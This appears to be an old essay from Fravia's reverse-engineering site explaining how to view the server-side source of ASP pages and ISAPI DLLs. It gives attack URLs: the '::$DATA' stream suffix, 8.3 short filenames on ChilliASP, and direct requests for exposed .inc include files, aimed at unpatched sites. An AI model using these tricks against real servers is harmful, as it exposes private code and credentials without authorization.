Hi Fravia,
I have been following your site for the last one month, all that I can
say is: its Fantabulous!!
I have read the articles on CGI scripts cracking, but ASP (Active Server
Pages) cracking doesnt seem to have been discussed till now.
So I thought I should write something about this 'technology' from
our Micro$oft's friends...
Regds,
Indian Maharaja
(Indian-Maharaja(at)usa(point)net)
Active Server Page reversing
By Indian Maharaja
Tools Required :
Nothing but your browser .
When M$ launched Windoze NT server, it was trying to compete against
existing
Unix platforms.
Since Billy boy couldnt make much progress he had this idea of
'bundling'
software, to snare
people who thought that all the software was for 'free'.
One of the many bloatwares that were launched were SQL-Server (an
abomination
of a rdbms),
IIS (Internet Info server). Now M$ decided CGI was a worthless
technology
(since they couldnt
control it) , so they laucnhed something called ISAPI (Internet Server
Api).
If you look, at
the documentation for IIS, it mentions full support for CGI, but you
will find
the documentation
littered with references as to why Isapi is a million times greater and
better
than CGI.
Lets prove the opposite..:-)
So what really is Asp ? Its availlable for download from the M$
website, but
it requires
IIS or PWS (personal web server installed). (Install Exe is 9Megs+ if
this
isnt bloatware
at its best then I am not maharaja).
Basically Asp is a wrapper on Isapi and allows server side scripting
using
VeeBee Script
or JavaScript (sorry JScript -- m$ version of Javascript).
A vey simple asp script is some thing like :
<HTML>
<%Response.Write("Hello")%>
</HTML>
which will result in a htm =>
<HTML>
Hello
</HTML>
which is downloaded to the clients machine, so if I do a view source I
can see
only the
resultant HTM , and not the Asp code as this translated to HTM on the
server
and then sent.
So what people generally do is keep all the code for validating
Passwords,
redirecting to
hidden pages inside the Asp file , and based on some user input show
only the
required
things to the user. Even if the user does a view-source he can see only
the
downloaded htm.
It would be very nice if we could see the Asp source...
There are very many sites using Asp and still more sites using Isapi
Dlls.
Since Asp
is a wrapper (a filter as the documentation says) on Isapi, it is
possible to
write Dlls using
VeeCee++ (ver 5.0 has an App-wizard option for that) and Mfc which can
provide
lower level
functionality.
If you find a page like this www.indianmaharaja.com/default.asp =>
bulls-eye
this site uses
Asp.
If you find a page like this
www.indianmaharaja.com/validate.dll?12473636 =>
most probably it
is an Isapi dll.
So lets get down to business...
1) if you are on an Asp page do this :
www.indianmaharaja.com/default.asp::$DATA
You will find that either the Asp code is dispalyed in your browser
window
(or)
a download window pops up which allows you to download the Asp.
So much for code security.
It seems its a bug in Isapi and a fix is availlable at m$ sites.
All the micro$oft sites have run this fix :-( . But I found many-many
other
web sites ,
who are still running the unfixed version :-).
2) Next I checked out a site which was using an Isapi dll, I tried
doing this
:
www.indianmaharaja.com/validate.dll
(entering just the name of the dll) -- nope i got a message :
'Hackers keep off'
Too bad, so I tried the trick specified in 1)
www.indianmaharaja.com/validate.dll::$DATA
Bingo ! I was able to download the dll.
I racked my brains as to how such a HUGE security hole could be there,
I
still havent
been able to figure it out. Most probably it is because of lousy
coding done
by the M$
loving bozos or it was there for some devious reason known only to M$.
3) The story doesnt end here ... my next assignment was of running Asp
on
Apache Server
for NT. M$ never provided a version of Asp (i.e.Isapi) for web
servers other
than
IIS. A company called ChilliSoft provides a version called ChilliAsp
which
runs on
Apache for NT(I dont know why anybody would want to run Asp in the 1st
place).
ChilliAsp availlable for download from M$'s site builder network site.
Now if you have an Asp file with a long file name say :
www.indianmaharaja.com/passwordval.asp
if you type the short file name in the browser
www.indianmaharaja.com/passwo~1.asp -- unbelievably the download
window pops
up and you
can download the asp script.
I have noticed this problem only in the apache version of asp. Though
a fix
might be
availlable now ( i am not sure), there could be many sites....
4) One more screwup -- that is most commonly done by the person who
wrote the
Asp scripts ,
Sometimes when I do a view source of a .asp file in my browser I get
something like this
along with just the html :
<!--#include file = "inc/encrypt.inc"-->
<!--#include file = "inc/AdminChk.inc"-->
<HTML>
.
.
Other stuff
.
.
</HTML>
What the bozo who created the page has done is include some common
.asp code
(like
validation routines which are used across pages) in a .inc file .
Now if the page being viewed was :
www.indianmaharaja.com/login.asp
just type in :
www.indianmaharaja.com/inc/encrypt.inc
your browser will promptly download this file .
Open the file and you have something like this :
<SCRIPT RUNAT=SERVER>
Function Encrypt(theStr)
..
..
..
End Function
</SCRIPT>
what you will see is the complete asp code.
Hope you find this information useful in the continuing battle against
billy's
boys at Micro$oft.
homepage
search_forms
links
+ORC
counter measures
tools
javascript wars
reality cracking
academy database
students' essays
antismut CGI scripts
cocktails
academy of anonymity
mail_fravia
Is reverse engineering legal?